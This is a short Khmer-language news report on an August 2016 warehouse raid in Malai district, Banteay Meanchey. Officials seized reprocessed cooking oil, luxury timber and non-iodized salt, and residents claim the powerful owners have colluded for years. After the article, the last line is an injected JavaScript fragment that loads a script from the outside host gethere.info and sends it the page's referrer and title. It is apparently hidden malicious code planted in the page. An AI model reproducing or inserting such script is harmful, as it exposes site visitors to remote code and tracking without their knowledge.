ប្រេងឆាកែច្នៃចំនួន៣៧ធុង និងឈើប្រណិតប្រភេទលេខ១ ចំនួន៩៣ដើម ត្រូវបានគេរកឃើញក្នុងឃ្លាំងមួយកន្លែង
ខេត្តបន្ទាយមានជ័យ៖ នៅថ្ងៃទី១៨ខែ សីហាឆ្នាំ២០១៦ ម្សិលមិញ ដោយលោកសុខកែវបណ្ឌិត ព្រះរាជអាជ្ញាររង ខេត្តបន្ទាយមានជ័យ បានដឹកនាំកម្លាំងបានចុះឆែកឆេរឃ្លាំងមួយកន្លែងដែលស្ថិតក្នុងឃុំទួលពង្រ ស្រុកម៉ាឡៃ ខេត្តបន្ទាយមានជ័យ ដោយមានការចូលរួម ពីកំលាំងជំនាញ ជាច្រើនរួមមាន មន្ត្រីរុក្ខាប្រម៉ាញ់ និងនគរបាល ប្រឆាំងបទល្មើស សេដ្ឋកិច្ចខេត្ត ក្រសួងព្រមទាំង មន្ត្រីជំនាញសាខា កាំកុងត្រូលខេត្ត បានរកឃើញឈើ ប្រណិតប្រភេទ លេខមួយចំនួន៩៣ដើម ប្រហែលជិត៥០ ម៉ែត្រគូបនិងបាន រកឃើញប្រេងឆាកែច្នៃ ដែលធ្វើអោយប៉ះពាល់ សុខភាពមនុស្ស ចំនួន៣៧ធុង ,នឹង៣៧ប៊ីដុងសរុប8510 លីត្រនិងអំបិល អត់មានជាតិអ៉ីយ៉ូត ចំនួន ប្រហែលជាង ៣តោន។
សូមបញ្ចាក់ថាការចុះ ឆែកឆេរឃ្លាំងមួយ កន្លែងនៅស្រុកម៉ាឡៃ គឺមតិពីមហាជន បានអោយដឹងថា ឃ្លាំងដែលឆែកឆេរ ខាងលើនេះក៏មិនមែន ជារឿងធម្មតាទេដោយ ប្រជាពលរដ្ឌដែលនៅជិត ទីនោះបាននិយាយថា ម្ចាស់ឃ្លាំងសុទ្ទសឹង អ្នកមានអំណាចដែល សមត្ថកិច្ទល្មមៗមិនហា៑នក្បែរ ហើយសុទ្ធតែមាន ការត្រូវគ្នាជាយូមកហើយ ដែលពួកមានអំណាច នាំគ្នាសម្ងំចែកគ្នាស៊ី លុយរាប់ឆ្នាំ ថែមទាំងនាំ គ្នាយកជាតិពុល មកបំពុលកូនខ្មែររាប៉ឆ្នាំ នៅពេលពលរដ្ឋ ទ្រាំលែងបានបែក ការសម្ងាត់ ទើបប្រថុយចាប់រឹបអូស យកសម្ភារះប្រហែល ៣០ភាគរយប៉ុណ្ណោះ សេសសល់ទុកចែកគ្នាបន្ត៕ ដោយ សៀមរាបប៉ុស្ដិ៍
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;